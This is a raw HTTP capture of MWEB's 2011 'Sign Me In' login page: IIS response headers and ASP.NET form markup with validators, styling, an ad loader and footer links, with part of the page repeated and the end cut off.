<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..